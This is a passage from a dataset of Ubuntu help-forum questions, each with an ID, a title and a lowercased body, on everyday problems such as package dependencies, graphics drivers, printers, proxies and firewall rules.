: 7f 00 10 08 sd 2:0:1:0 : [ sdc ] write cache : enabled , read cache : enabled , supports dpo and fua sd 2:0:2:0 : [ sdd ] write protect is off sd 2:0:2:0 : [ sdd ] mode sense : 7f 00 10 08 sd 2:0:2:0 : [ sdd ] write cache : enabled , read cache : enabled , supports dpo and fua sd 2:0:3:0 : [ sde ] write protect is off sd 2:0:3:0 : [ sde ] mode sense : 7f 00 10 08 sd 2:0:3:0 : [ sde ] write cache : enabled , read cache : enabled , supports dpo and fua sd 2:0:4:0 : [ sdf ] write protect is off sd 2:0:4:0 : [ sdf ] mode sense : 7f 00 10 08 sd 2:0:4:0 : [ sdf ] write cache : enabled , read cache : enabled , supports dpo and fua sd 2:0:5:0 : [ sdg ] write protect is off sd 2:0:5:0 : [ sdg ] mode sense : 7f 00 10 08 sd 2:0:5:0 : [ sdg ] write cache : enabled , read cache : enabled , supports dpo and fua is it just that mpt2sas does n't support trim ( sas unmap ) ? could someone recommend a working controller for a rack-mounted system or jbod if this one does n't support it ? i need between 8 - 16 sata ssds ( non-raid configuration ) in a rack-mounted system or jbod combined with a controller that supports trim .
416888	ubuntu-sdk plugin loader errors : could not resolve dependency 'core ( 2.7.1 ) ' could not resolve dependency 'projectexplorer ( 2.7.1 ) '	( in ubuntu 13.10 ) ubuntu-sdk opens with the following errors : does anyone know how to resolve these dependencies ?
416890	how to find unspecified repetition in lines of text	i have educational videos that i am trying to burn to a dvd using bombono dvd along with their corresponding subtitles . the subitles ( .srt files ) have the following format : 1 00:00:00,000 -- > 00:00:02,000 in the video where we introduced the atom , i went 2 00:00:02,000 -- > 00:00:06,000 off a bit about how at the center of an atom we have the 3 00:00:06,000 -- > 00:00:09,000 nucleus , and it 's actually a very small fraction of the etc . however , there are quite a few errors in the subtitles in which the time for a line is zero seconds . for example : 81 00:03:37,000 -- > 00:03:37,000 a little bit faster . when the dvd authoring software finds these lines , it cancels the entire dvd burning process . i can find out which line caused the error , but then i have to start the burn again before i know where the next one is . my question is whether it is possible to create a script which will search all of the subtitles files and find all instances of repetition on a single line if i do n't know what the exact string is that is repeated . essentially , is it possible to show every line that has 12 characters repeat without specifying what those characters are ( since they are different in every instance ? ) thanks for your help .
416891	graphics problem resulting from upgrade	i updated our ubuntu operating system on monday , february 3 , 2014 , and ran into a familiar problem for which the earlier fixes do n't seem to work . we 're running ubuntu 12.04 lts on a relatively new amd athlon with , i think , a gf108 graphics board . the villain of this story is probably the vga lcd monitor . it 's an older acer v193w . when i did the update and rebooted , support for the monitor disappeared and the only settings available were generic 1024 x 768 or 800 x 600 . neither provide a very satisfactory picture , not to mention a rather reduced desktop . this is not the first time this has happened . in the past , i 've been able to remedy the problem by inserting the monitor 's settings into /etc/x11/xorg.conf . this no longer works . in fact , it 's not even clear to me that this current update uses an xorg.conf file . asking ubuntu to scan for the monitor 's settings does n't work ; i think because this particular monitor does n't reply , the information is not available from it . any ideas ?
416892	show desktop button keeps moving in unity	my show desktop button keeps moving around the unity toolbar . it is n't a giant problem , but it is annoying to try and find it all the time . how do i make it stay put ? using ubuntu 13.10
416893	is there a central configuration tool for ubuntu such as yast on opensuse ?	in opensuse there is a set up tool called yast working on gui and command line . is there such tool for ubuntu for instance on yast one can configure samba and the services . here is a picture for those that do not know :
416894	how to setup sendmail with nginx	i have a ubuntu server with nginx i have installed sendmail on it by running apt-get install sendmail i was also able to sendmail using sendmail < my_email_address > hello . the mail i received on the specified email was from myusername @ ns1234.ip-12-34-23.eu . here myusername is the username of my ubuntu machine i want to create new mail accounts like info @ mydomainname.com contact @ mydomainname.com etc . i have read many guides but they assume that the person is running apache2 so the folders were different from what i have
416895	how to resolve conflicts in desktop entries ?	i am unhappy with baobab opening directories instead of thunar . so far i think i have identified the problem : applications $ grep -ir `` =inode/directory '' thunar-folder-handler.desktop : mimetype=inode/directory ; baobab.desktop : mimetype=inode/directory ; how should i resolve it ? i want my choice to survive 'compatible ' upgrades for all users but be invalidated if apps change , get purged etc . is there a well-defined workflow for it ?
416899	problem with alt+tab switch after removing cairo-dock	i recently removed cairo-dock after using it in a mac os-theme , and now i 've got two different alt+tab switchers , if that makes any sense . there 's the standard ubuntu switch and on top of that i have an ugly white one . anyone knows what it is and how to get rid of it ? i 'm pretty new to ubuntu so i would really appreciate some help .
416901	i want to call relation-changed hook from config-changed hook	i want to call the relation-changed hook whenever there is a config-change and config-change hook is called . can i directly call relation-changed from config-change hook . my config-change hook is written in bash . config-change : # ! /bin/bash ... relation-changed is it the right way to call it . appreciate your response . thanks in advance .
416904	ubuntu 12.04 newly installed running like a snail	i installed ubuntu 12.04 64 bit in my dell poweredge t605 workstation . the workstation has a quad-core amd opteron processor with 15.7 gb of memory . ubuntu is running like a snail right from the log in page ( it takes a long time to write the password from the time i type and it is terribly sluggish moving between guest and user accounts ) . when it finally logs in the windows move veeery slowly . work whithin terminals and internet is fine . i tried working with unity 2 , lubunto to no avail . i looked into my graphics card ( amd/ati es 1000 ) but i do n't find any drivers for it . finally , i tried installing the ubuntu 12.04 32 bit . equally slow . next , i installed ubuntu 13.10 . even slower . what is the problem ? should i attempt earlier versions of ubuntu ? are these too much for my workstation ? thanks .
416907	ufw not blocking connections to docker instance	i have a webservice running inside a docker instance which was run using the following command : sudo docker run -d -p 4040:4040 ... . my ufw rules look like this : ~ sudo ufw status status : active to action from -- -- -- -- -- -- 22 allow anywhere 4040 deny anywhere 22 allow anywhere ( v6 ) 4040 deny anywhere ( v6 ) when i access the box directly via its ip , i can access port 4040 . why is the ufw rule not blocking it ? note : as part of the docker installation , i changed default_forward_policy= '' drop '' to default_forward_policy= '' accept '' in /etc/default/ufw as per dockers instructions here ( http : //docs.docker.io/en/latest/installation/ubuntulinux/ # docker-and-ufw )
416909	which drive to select ?	i 'm using 13.10 but recently installed windows 7 via usb . linux changed things around , so to install windows 7 which do i choose ? here 's a picture .
416911	copying hard-drive onto another machine	i have a ubuntu machine ( at work ) and i have a macbook as well . is it possible to copy the entire operating system ( on my work ubuntu machine ) over to the hard drive on the mac ? i do n't really care if it wipes off the mac osx . looking for any suggestions or tutorials , hopefully that wo n't destroy my entire work machine because then i would be screwed ! !
416916	how to delete just the preceding space in a text file ?	i have a text file that has a space before the line . how do i delete it using tr ( or the correct command ) ? for example , i have this : text i would like this : text but , how do i do that for a 200 line text file ? i currently have this pipeline : cat file.txt | tr -s `` `` | tr -d `` , '' the other tr commands are for removing other aspects of the text files .
416920	trying to understand libapache2-mod-auth-mysql	i 'm trying to install mysql server , client and phpmyadmin . i was able to successfully install mysql server and the client.. on the phpmyadmin , from the video instruction i was trying to follow it says to install 3 things , php5-mysql phpmyadmin and libapache2-mod-auth-mysql i was able to successfully install php5-mysql and phpmyadmin and was able to test it on going to localhost/phpmyadmin and i was able to login . my question is , do i need to install libapache2-mod-auth-mysql ? cause i got an error when i tried to install that , saying that libapache2-mod-auth-mysql has no installation candidate is libapache2-mod-auth-mysql needed ? i 'm running on linux ubuntu 13.10
416921	multiple monitors , multiple nvidia cards	this has been bothering me for a couple days and i have n't gotten much further , so i humbly beg assistance . i have a asrock z77 sandybridge i7 desktop with three video cards ( built-in intel , nvidia 9600gt and nvidia 560gtx ) . i have three monitors ( two 1080p and a 1680x1050 ; all viewsonic ) and a tv ( 1080p ; vizio ) . the monitors and tv are all connected to the nvidia cards ( two heads per card , dvi connections ) and i do n't have anything connected to the built-in intel . i want to : get all the monitors to display an image be able to drag a window , either from an application or just a folder , from monitor to monitor my computer is dual-booting ubuntu gnome 13.04 and windows 8.1 . the monitors and tv work fine in windows 8.1 . =========== i currently am running ubuntu gnome 13.04 . that 's not because i love gnome , it 's because i was actually able to get a window to move from one monitor on one video card to another monitor on another video card with the gnome put extension -- well , when i booted from the ubuntu gnome live cd , at least . i 'd actually prefer kde . problems : i ca n't use nouveau . noveau causes the fan on the 9600gt card to spin at 100 % . installing an nvidia driver fixes that problem . i 've tried various guides both here and elsewhere to install the latest nvidia drivers and had almost no success . i 've generally been able to get one of the drivers from the repository ( 319 ) to work , but for not more than two monitors . there was one exception : when i tried linux mint 16 kde . whenever i 've enabled xinerama , i 'll get all black screens at reboot , even in recovery mode . when i try , for instance , ctrl-alt-f1 , i 'll hear the 9600gt 's fan start up , then spin down , then spin up , etc. , but never get video . thanks for your time !
416923	problems installing gcc for cross compiling for arm	i 've been trying to install the gcc-arm-linux-fnueabi package , and i 've done it a few times by a few different methods but i always seem to be missing the c++ folder in the includes directory . to install , i used : sudo apt-get install gcc-arm-linux-gnueabihf and after the installation completes , i have the arm-linux-gnueabi and arm-linux-gnueabihf folders in my /usr directory . when i go into the /usr/arm-linux-gnueabi/include folder though , there 's no c++ folder as i expect there to be , so headers such as iostream , etc . are missing . same goes for within the arm-linux-gnueabihf directory . does anyone know what might be causing this ? did i miss something , perhaps ? i 'm fairly new to cross compiling but all the documentation i 've studied indicates that there should be a c++ folder among the includes , and without it , my attempts to compile even simple test codes fail , since even the iostream header is not available . my machine : 64bit intel i7 processor , on a asus n56vz running ubuntu 13.10 target devices : beaglebone ( both white and black )
416924	is it possible to have multiple files with the same name in a folder ?	this is my scenario : am currently applying for jobs and have to write alot of application letters - ( almost ) same content every time , only the date changes . all of these letters are named letter.pdf . as of now , am having to create multiple folders named by date , like 15th , 1st , etc to know which letter is for what date . my question is , is it possible to have all these letters in the same folder , with the same name but use something like the modified date to differentiate them ?
416927	install a game from a zip file	how do you install a game from a zip file ? i downloaded gems from the ubuntu software centre and they offered a free download it came as a zip file how do you install it ?
416930	`` unable to fetch some archives '' when trying to install phpmyadmin	err http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main mysql-common all 5.5.34-0ubuntu0.12.04.1 404 not found [ ip : 194.169.254.10 80 ] err http : //security.ubuntu.com/ubuntu/ precise-security/main mysql-common all 5.5.34-0ubuntu0.12.04.1 404 not found [ ip : 91.189.91.15 80 ] err http : //security.ubuntu.com/ubuntu/ precise-security/main libmysqlclient18 i386 5.5.34-0ubuntu0.12.04.1 404 not found [ ip : 91.189.91.15 80 ] err http : //security.ubuntu.com/ubuntu/ precise-security/main mysql-client-core-5.5 i386 5.5.34-0ubuntu0.12.04.1 404 not found [ ip : 91.189.91.15 80 ] err http : //security.ubuntu.com/ubuntu/ precise-security/main mysql-client-5.5 i386 5.5.34-0ubuntu0.12.04.1 404 not found [ ip : 91.189.91.15 80 ] err http : //security.ubuntu.com/ubuntu/ precise-security/main mysql-client all 5.5.34-0ubuntu0.12.04.1 404 not found [ ip : 91.189.91.15 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-common_5.5.34-0ubuntu0.12.04.1_all.deb 404 not found [ ip : 91.189.91.15 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/libmysqlclient18_5.5.34-0ubuntu0.12.04.1_i386.deb 404 not found [ ip : 91.189.91.15 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client-core-5.5_5.5.34-0ubuntu0.12.04.1_i386.deb 404 not found [ ip : 91.189.91.15 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client-5.5_5.5.34-0ubuntu0.12.04.1_i386.deb 404 not found [ ip : 91.189.91.15 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client_5.5.34-0ubuntu0.12.04.1_all.deb 404 not found [ ip : 91.189.91.15 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i 'm trying to install phpmyadmin in a oracle vm virtual box using the command sudo apt-get install phpmyadmin , this is the only package ( so far ) that has given me issues , it 's also the first time i 'm running oracles software on windows , any ideas ?
416932	screen flashes between guest and user account	so it 's like theres 2 sessions and ubuntu ca n't decide which one should take precidence . i 've only made this bug happen once before , but not to this extent . usually what happens is two mice , one with a box around it ( usually it 's over a blank screen ) , but this is the first time i 've ever seen it to the extent i have the user and guest desktops essentially flickering back and forth at random and very quickly , and also been able to access anything from either desktop ( via the correct mouse ) i had dropped to the shell , signed in , then ctrl-alt-f7 , accessed the gueest account , and when i was done i logged out of guest and that 's when all this weird business started happening . i 've tried taking a screenshot but it does n't capture what i 'm seeing/frame breaks or anything , just the vanilla desktop this would be useful if not for the danger of seizures i 'm gon na blame this on xauthority , just because it already does n't function properly . but this is probably the strangest error i 've ever encountered , it 's like this machine has no cognitive dissonance
416936	removing sys-v-init script in favour of rc.local . will application still shutdown correctly ?	i 've had to remove the /etc/init.d/crashplan script by doing update-rc.d -f crashplan remove in favour of starting the daemon using /etc/rc.local ( the reason for this is that i have an encrypted home dir that only gets mounted upon user login , and this is causing the backup daemon some issues during boot , see here for more details ) . this all seems to work pretty work for starting the service only after login , but what i 'm wondering is if crashplan will still shutdown correctly on system reboot or halt without the sys-v-init script links in /etc/rcn.d ? to be honest , when i did the update-rc.d -f crashplan remove only a startup script from /etc/rc2.d was removed anyway , which makes me think it 's probably fine . however , i just wanted to check i should be putting kill symlinks in the 0,1,6 runlevel dir ?
416937	apt-get does n't work behind a proxy	my company uses an http proxy and our various ubuntu 12.04 servers therefore need to be configured properly , namely by setting \etc\apt\apt.conf.d\80proxy to : acquire : :http : :proxy `` http : //proxy.mycompany.com:80 '' ; acquire : :http : :no-cache true ; now , since a few days , this method suddenly stopped working : i run into sum mismatch errors . i have tried all the usual tricks found on stackoverflow or on the web , among others : sudo rm -fr /var/lib/apt/lists/* sudo apt-get clean but nothing seems to work . i even switched to a ftp server , without any luck . what 's a radical solution to this problem ? is it likely that the proxy server has some kind of issue ? what could it be ? using ubuntu 12.04
416941	disabling gedit backup files ( filename~ tilde )	how can i get the following command to change for the root user as well ? gsettings set org.gnome.gedit.preferences.editor create-backup-copy false this command should disable gedit backup files . it seems to work for the current user `` vagrant '' as shown in the screenshot below , but not root . http : //i.stack.imgur.com/en0vs.png it is important to mention that this command needs to be run as the current user `` vagrant '' as it is part of a script . ubuntu 12.04 kernel 3.2.0-58-generic-pae gnome 3.2.1 running linux in a vagrant vm on windows 8 using virtual box
416948	solutions for removing the skype indicator in panel on ubuntu 12.04 do n't work	my question is similar to this one , except that i have already tried those solutions with no success : i tried sudo apt-get remove sni-qt and it did n't work , also with sni-qt : i386 . i also followed the steps to use apparmor . since i do n't know what i 'm doing , i also tried different combinations of the three above , and restarting the computer . my first question , what is the package sni-qt for ? and why should i be worried of uninstalling it ? and my second , why could they be not working on my computer ? or is it me that am not doing it right for some reason ? thanks and have a good day . diego
416950	laptop fan runs continously after ati fglrx driver update	i have a dell studio 1555 , i 'm using ubuntu 12.04 lts and it was working flawlessly until the latest update . the fan is running at unreasonably high speeds while only 5-6 % of the cpu is used . i made some research , i know that there are ways to control the fan speed , but in this case i just want to get rid of the modification what caused the problem . i installed about 15 updates today ( feb 05 ) , is there any way to find out what is causing the problem ? is there any way to reverse these updates ? any suggestions ?
416953	ubuntu 13.10 - 3.11.0-15-generic - can not install skype	been trying to install skype on ubuntu 13.10 ( 3.11.0-15-generic ) , but with no success . have tried : $ sudo dpkg -- add-architecture i386 $ sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' $ sudo apt-get update -y $ sudo apt-get install skype reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . skype : depends : skype-bin e : unable to correct problems , you have held broken packages . so then i try : $ sudo apt-get install skype-bin reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . skype-bin : i386 : depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed depends : libgl1-mesa-glx : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . have tried through aptitude , but the same result . any suggestions ? thanks .
416954	amd/ati es1000 vga card slows down ubuntu 12.04	i freshly installed ubuntu 12.04 64 bit ( and after that the 32 bit but did not work ) . it runs very slow . after checking the forum i narowed down the problem to the graphics card . does anyone know what to do ? looking for additional drivers returns nothing . thanks !
416957	problem with portable hard drives	i am a new ubuntu user running 13.10.2 and i am trying to transfer the files from my previous computer , a macbook , over . they are stored on two different portable hard drives . i am having a huge amount of difficulty with this . almost every single file has a different problem . many of the jpgs are labled jpeg , refuse to be renamed and wo n't open with any image program . when i click them they say : failed to open input stream for file . they ca n't be renamed and when i try to put them onto the computer they say : error while copying `` file '' error opening file : permission denied every video file on the drive seems to need a different set of plug-ins which i do n't know how to get . from advanced streaming format ( asf ) demuxers to mpeg-1 layer 3 ( mp3 ) decoders and on2 vp6/flash decoders . seemingly an endless stream of different updates . some of the word documents are showing up as zip archives which , predictably , extract into a pile of useless files . some of the other word files do not do this . i am slowly working my way through these problems one by one , but there are so many issues i think i must be going about this in a fundamentally wrong-headed way . is there something i have to do to make ubuntu work with my drives ?
416958	aws ubuntu server	hey i am really new to ubuntu so hopefully someone can help me out set up a vps on aws . i have created a private key to use with ssh . i am wondering what is the best way for me to allow someone else i am working with to access the server . i of course ca n't give them my private key , so will public keys work for that ? or what is the best way to set up a user account for them so they can access it through ssh ?
416961	battery meter shows 6 minutes left immediately after unplugging power , and hibernates sometimes	i have a lenovo y400 . whenever i unplug the laptop , the battery meter shows 0:06 or less and the laptop battery critically low message pops up . it hibernates once in a while , the rest of the time it increases gradually and shows the correct time after about a minute . how can i fix this ?
416962	intermittent internet name resolution	i have a problem with name resolution ( i believe ) . i have recently installed lxle 12.04.3 . when i search for updates , i get a number of `` something wicked happened '' responses and it ca n't find all of the updates . when i use firefox , i get many `` server not found '' messages . my normal set up is to have my firefox profile on my nas and i use the esr version ( v24.2.0 ) . as this is n't standard , i reverted to the firefox version that came with the distro and allowed it to create a profile where it normally does and disabled all add-ons . the problem remained . if i keep clicking on the `` try again '' button , it eventually loads the page but this could take up to about 20 attempts , although usually fewer . i tried changing from my isp 's dns addresses to the google ones ( 8.8.8.8 and 8.8.4.4 ) . the problem remained . i then experimented with ping . i tried to access web pages in firefox . when i got the first `` server not found '' message , i tried pinging the url in a terminal and got an `` unknown host '' message . i then went back to firefox and kept clicking on the `` try again '' button until the page loaded . then , going back to ping , the responses came in fine . there seems to be a dns cache that works for a while after first resolving the name look up . this computer works well on windows xp . so , the problem does n't appear to be with the hardware or my isp , although it may be driver related . also , it is n't peculiar to firefox as the ubuntu update manager and sudo apt-get update experience the same problem . the driver for my wireless device that has loaded is rt2800usb and the `` connection information '' box reports reasonable speeds . lsusb gives the id as 148f:5370 ( ralink rt5370 ) . access to the nas using the wireless link is good . web access is good once the host name has been resolved . i have years of experience with windows but am new to linux and , although i have narrowed this down a bit , i do n't know where to look next . it looks like a dns look up problem but does n't appear to be a problem with the dns servers . the computer is a bit useless like this and i would really like to give lxle a go . can someone please help me to progress this ?
416964	how to hide some icons in system settings ?	i installed programs to tweak ubuntu settings . i found a blog that gave me good ideas , and also a good place to start . the problem is that these programs that i was installing in my computer to tweak , installed an icon in the system settings . how to remove the icons of the following programs : myunity , skype wrapper settings , ubuntu one , ubuntu tweak .
416967	unable to print from visual basic running in wine ?	i 'm new to ubuntu and i have installed microsoft visual basic using wine but i am unable to print to lp0 . i am using the following code : open `` /dev/lp0/ '' for output as # 1 in windows i used to use the following : open `` lpt1 : '' for output as # 1 this has worked for years in windows . tried both in ubuntu and i get a runtime error 75 . other programs can print with no problem . checked printer device uri : parallel : /dev/lp0 , access control allow printing for everyone . even the vb6 complier can print . what am i missing ?
416969	raid stability with ubuntu	im planning on building a ubuntu box as a raid storage computer connected over a network to my other home computers . i have about about 4tb of data i would like to have on a secure backed up system , along with wanting to build my own computer so thats why im asking about this choice . i just want to know from others what the stability of raid arrays on ubuntu is and if i need the server edition or desktop edition of ubunto to pull this off .
416976	shortcuts for moving and resizing windows do n't stay .	i am using ubuntu 12.04 and i want to setup the keyboard shortcuts for moving and resizing windows . i found the specific location in compiz to do this but the shortcuts that i choose wo n't stay put . as soon as i go out of the screen and come back to it , it 's already changed back to what it was . i have no idea why it does this . can someone give me some light ? thanks and have a good day . diego
416978	brother mfc665cw on ubuntu 12.04	i 've been trying to install brother mfc665cw on ubuntu for months now . about five minutes ago , it finally said `` new printer detected '' and shows it in the list of my printers , but from the scanner/printer , when i send a file over it said `` connecting to pc ... '' but it obviosuly is n't doing anything . any ideas on this ? it looks like they are n't connecting to one another , just detecting .
416979	gateway server in rdesktop	i know that microsoft servers follow rdp 6.x and that somehow remmina does n't seem to support this . is there a remote desktop client around that will support ts connections ?
416980	driver for canon pixma mg5520	i have been looking for a driver for a canon pixma mg5520 all in one under ubuntu 12.04 . i have not found any in various searches . the michael-gruz ppa does not have it . canon claims : there is no driver for the os version you selected . the driver may be included in your os or you may not need a driver . my system does find the printer but mg 5500 series drivers do n't show up in the install list . am i just out of luck ? ( another mg5520 question does not look as if it was resolved ... )
416986	audiobox not selectable as output device	i have n't been able to get my audiobox 44 vsl working , oddly . i recently re-installed and for some reason my audiobox is not selectable in system settings as an output device . the device shows up in /proc/asound as a directory titled `` vsl '' and also shows up in alsa mixer , but is listed as having no controls . i did n't have to any setup on my last installation . i 've searched around and have n't found a solution to this . the system is obviously recognizing that the device is plugged in , yet i have n't been able to select it as an output device . i 've also tried pavucontrol , and it lists the same two devices as system settings , the hdmi on my video card , and and the default analog out . help would be greatly appreciated ! thanks .
416991	cant connect to wifi ubuntu 13.10	i 'm using a hp envy 15-j009 wm laptop wifi works fine when i run windows but does n't work with ubuntu the backlit on the wifi key is red saying that the wifi is off but i can see my wifi under the networks but cant connect
416992	adding subdirectories in samba	just an easy question about samba 's conf file . i have successfully created a samba server on my computer , but having troubles with the configuration file . i would like to create a server where each user , lets say , alice , bob , chris and doug , to have a 'home ' each consisting of a folder that are hosted in different parts of a hard drive . my ideal samba server directory set-up : ( actual hardrive locations are in brackets ) sorry for the picture , i just could n't format it right on the website any ideas ? your help is greatly appreciated .
416993	update manager - not all updates can be installed - partial upgrade	i have ubuntu 12.04lts . when i was running the update manager , it was interrupted . when i restarted the computer , and tried to run the update manger , i received the message `` not all updates can be installed . '' it gives me the option for a partial upgrade . when i click the button , i am asked for a password , i am told `` unable to get exclusive lock . '' when i click ok , the update manager shuts down . when i try to update through the terminal ( sudo apt-get update ) i get the following message : '' e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? when i run sudo fuser /var/lib/dpkg/lock the response is : /var/lib/dpkg/lock : 2256 when i run sudo lsof -p /var/lib/dpkg/lock the response is : lsof : warning : ca n't stat ( ) fuse.gvfs-fuse-daemon file system /home/herndon/.gvfs output information may be incomplete . command pid user fd type device size/off node name dpkg 2256 root 3uw reg 8,1 0 1311667 /var/lib/dpkg/lock i have tried restarting the computer and running sudo killall but without success .
416995	how to list all available printers from terminal ?	i need a command to list available printers in my ubuntu . the printers list could be installed or shared ? this list also should state the state of the printer . any help to achieve my goal ?
417000	setup 3 monitors at once two dvi via ati card one via vga onboard	i am trying to get three display support going and it may just be a matter of setting up a xorg.conf file properly . after all the research i 've done , it should work with the hardware i 'm using just fine . ubuntu : lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise processor : intel® core™ i5-3450 cpu @ 3.10ghz × 4 that 3rd gen processor supports 3 monitors : # of displays supported ‡ 3 source : http : //ark.intel.com/products/65511/intel-core-i5-3450-processor-6m-cache-up-to-3_50-ghz graphics : sudo lshw -c video *-display description : vga compatible controller product : rv620 le [ radeon hd 3450 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:43 memory : e0000000-efffffff memory : f7c20000-f7c2ffff ioport : e000 ( size=256 ) memory : f7c00000-f7c1ffff *-display description : vga compatible controller product : xeon e3-1200 v2/3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : f7800000-f7bfffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) the radeon hd 3450 has ati crossfirex™ multi-gpu support which i understand will enable it to work fine with another video card : the onboard vga compatible controller . source : http : //www.amd.com/us/products/desktop/graphics/ati-radeon-hd-3000/hd-3400/pages/ati-radeon-hd-3400-overview.aspx contents of x11 ( i have n't touched anything ) : ls /etc/x11/ app-defaults fonts xinit xreset.d xsession.d cursors rgb.txt xkb xresources xsession.options default-display-manager x xreset xsession xwrapper.config so with the ati card i have a dual head splitter which i connect to two dvi cords on dual monitors - and when the vga screen is n't plugged in - they work as expected as a dual set-up . when trying to attach the vga card it does n't get any juice or show up under the ubuntu display settings and just continues as a dual set-up . i figured i 'd have to boot with the vga onboard enabled then activated the ati attached displays somehow . so what i 'm trying now is to boot with the vga plugged in ( which is working fine ) but i ca n't get either of the other two screens up and they are not listed under the display settings . any suggestions are welcome , thanks . edit : i also have an onboard hdmi port i could utilize ( one dvi through ati , one vga via onboard , one hdmi via onboard ) , but i thought hdmi had to be dedicated , but not sure about that.. edit 2 : this is a dell optiplex 3010 .
417001	how do i open wakfu from the terminal ?	i am trying to launch the game wakfu from the terminal . i am doing this so i can make a shortcut for it , but i need to know the command for it . how do i do this , or how do i find out how to do this ? i am using ubuntu 13.10 if that helps .
417003	running ubuntu from external usb 2.0 hdd on macbookpro 6,2 with i5 processor	i believe this question has been asked but i did n't see any actual answers so i figure i 'll ask again and maybe someone will have come up with something . i have installed a copy of ubuntu 10.04 ( i think , whatever the long term support version is ) onto an external hard drive and everything works great . i can boot from whatever computer i want by accessing the boot menu and selecting the external hdd as the boot location . i love it . except when i try to do this on my macbook pro 6,2 witn an i5 processor and 4 gigs of ddr3 ram . i did everything the same as i did for my windows machines , accessed the boot menu by holding the option key , but alas the external hdd did not appear as an option . only the two partitions on my internal drive ( one with mac osx 10.6.8 and one with windows 7 ) . so i did some snooping and eventually tried installing refit . i successfully installed refit and rebooted , accessing the refit boot manager . i was ecstatic because the external hdd was displaying and even indicated linux was installed on it . i tried to select this drive and it started but then for some reason it kicked me over to the windows partition with no warning ( which is an entirely different story about how for some reason windows has essentially taken over my machine forcing me to access the boot loader any time i restart to boot into osx but anyway ) . i then rebooted and tried using the partition tool but it said everything was fine . i did some more snooping and found someone who said installing refind helped them so i tried installing that ( i did n't think this would make a difference since both refit and refind are boot managers , not boot loaders ) . my suspicions were confirmed . i accessed the refind boot manager , and just like with refit the external hdd appeared but when i would select it , it would kick me over to the windows partition . has anyone come up with a solution to this problem ? i would love to be able to access my linux boot on my mac because my windows based pc is old and no longer can run off of charge , plus the charger for it is going bad and does n't work all the time . all that i really want it for is for coding with c++ ( which i know i can do natively in mac osx but i would rather work in ubuntu ) . just one more bit of information . when i plug in the external hdd while running mac osx i get an error of '' the disk you inserted was not readable by this computer . ''
417005	my built-in mic will not work in ubuntu	before i upgraded today to ubuntu 12.04 , my built-in mic worked fine . now it does n't even appear in my sound settings ! ! and my sound quality is terrible when listening as well . am i doing something wrong ?
417006	black screen past boot screen	i running unbuntu 13.10 on a gateway gt5618e and im having a lot of trouble with my geforce 6150 le video onboard card for quite some time , switched to a different driver and now it will not boot past the boot screen all i get is black screen . tried replacing `` quiet splash '' with `` nomodeset '' in grub still black screen as well as in advanced options '' failsafex '' any ideas ?
417008	kubuntu installation disabled my windows partition	i tried to install , kubuntu 12.04 , i tried to install it in the same partition than windows ; i aready did it with ubuntu and everything worked well , this time , the installation of kubuntu gave me a message saying that the installation crashed and i got my windows partition disabled ; can you help me to get back my windows partition thanks in advance
417010	why does my usb card reader ( dell 2405fpw ) not recognize any inserted media ?	my dell monitor ( model 2405fpw ) has a built in usb card reader that is recognized by ubuntu 13.10 , but any inserted sd cards do not get seen . it used to work with an older version of 32-bit ubuntu on a different computer , but not with my new 64-bit 13.10 computer . this shows that linux sees the card reader : $ lsusb bus 002 device 047 : id 0424:223a standard microsystems corp. 8-in-1 card reader bus 002 device 046 : id 0424:2504 standard microsystems corp. usb 2.0 hub bus 002 device 045 : id 0424:2502 standard microsystems corp . here 's what i get in /var/log/syslog when i plug an sd card into the reader : feb 5 19:57:11 snorkack kernel : [ 379834.319439 ] usb 2-1.2.2 : reset high-speed usb device number 47 using ehci-pci feb 5 19:57:11 snorkack kernel : [ 379834.463095 ] sd 20:0:0:3 : device offlined - not ready after error recovery here is /var/log/syslog when i connect the usb cable between the monitor and the computer . there are some errors , `` hub_port_status failed ( err = -71 ) '' , but googling did n't it help much . feb 5 19:46:45 snorkack kernel : [ 379209.152114 ] usb 2-1.2 : new high-speed usb device number 44 using ehci-pci feb 5 19:46:45 snorkack kernel : [ 379209.244291 ] usb 2-1.2 : new usb device found , idvendor=0424 , idproduct=2502 feb 5 19:46:45 snorkack kernel : [ 379209.244296 ] usb 2-1.2 : new usb device strings : mfr=0 , product=0 , serialnumber=0 feb 5 19:46:45 snorkack kernel : [ 379209.244721 ] hub 2-1.2:1.0 : usb hub found feb 5 19:46:45 snorkack kernel : [ 379209.244890 ] hub 2-1.2:1.0 : 2 ports detected feb 5 19:46:45 snorkack kernel : [ 379209.347802 ] hub 2-1.2:1.0 : hub_port_status failed ( err = -71 ) feb 5 19:46:45 snorkack kernel : [ 379209.352039 ] hub 